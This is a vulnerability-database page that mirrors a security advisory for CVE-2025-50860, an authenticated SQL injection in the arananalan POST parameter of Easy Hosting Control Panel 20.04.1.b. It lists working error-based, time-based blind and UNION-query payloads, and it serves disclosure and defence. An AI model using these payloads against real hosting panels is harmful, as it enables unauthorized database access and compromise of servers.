Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Easy Hosting Control Panel 20.04.1.b SQL Injection

🗓️ 18 Aug 2025 00:00:00Reported by Korn Chaisuwan, Charanin Thongudom, Pongtorn AngsuchotmeteeType 
packetstorm
 packetstorm🔗 packetstorm.news👁 101 Views

EHCP 20.04.1.b SQL injection in listdomains arananalan POST; authenticated access; CVE-2025-50860

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2025-50860
22 Aug 202521:02
circl
CNNVD		EHCP Easy Hosting Control Panel 安全漏洞
21 Aug 202500:00
cnnvd
CVE		CVE-2025-50860
21 Aug 202500:00
cve
Cvelist		CVE-2025-50860
21 Aug 202500:00
cvelist
EUVD		EUVD-2025-25492
3 Oct 202520:07
euvd
NVD		CVE-2025-50860
21 Aug 202515:15
nvd
OSV		CVE-2025-50860
21 Aug 202515:15
osv
Positive Technologies		PT-2025-34226 · Unknown · Easy Hosting Control Panel
21 Aug 202500:00
ptsecurity
RedhatCVE		CVE-2025-50860
23 Aug 202500:23
redhatcve
Vulnrichment		CVE-2025-50860
21 Aug 202500:00
vulnrichment
Rows per page
Title: Easy Hosting Control Panel (EHCP) 20.04.1.b - SQL Injection in the
    listdomains function via the arananalan POST parameter
    
    Description: SQL Injection vulnerability exists in the listdomains function
    of Easy Hosting Control Panel (EHCP) 20.04.1.b, where insufficient
    validation of the arananalan POST parameter in the /index.php?op=listdomains
    endpoint allows an authenticated attacker to inject malicious SQL queries.
    By leveraging error-based, time-based blind, and UNION-based techniques,
    the attacker can extract or manipulate backend database content,
    potentially leading to unauthorized access and full compromise of the
    database.
    
    Source Name/Email: Korn Chaisuwan ([email protected]), Charanin
    Thongudom ([email protected]), Pongtorn Angsuchotmetee
    ([email protected])
    
    
    CVEs: CVE-2025-50860
    
    Software URL: https://www.ehcp.net/
    
    
    Parameter: arananalan (POST)
        Type: error-based
        Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
        Payload: aranan=test&arananalan=(UPDATEXML(8509,CONCAT(0x2e,0x7162717071,(SELECT (ELT(8509=8509,1))),0x7178627871),5369))
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
        Payload: aranan=test&arananalan=(SELECT 2663 FROM (SELECT(SLEEP(5)))NNwr)
    
        Type: UNION query
        Title: MySQL UNION query (23) - 8 columns
        Payload: aranan=test&arananalan=-9147 UNION ALL SELECT
    23,23,CONCAT(0x7162717071,0x696d4f4961444246667a4a5843676b74557165416a6253447a6343725472506f4749456d68547075,0x7178627871),23,23,23,23,23#

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Aug 2025 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.16.5
EPSS0.00058
SSVC
hosting control panelsql injectionlistdomains functionarananalan post parameterauthenticated accesserror basedtime based blindunion querydatabase compromisevulnerability identifier .
101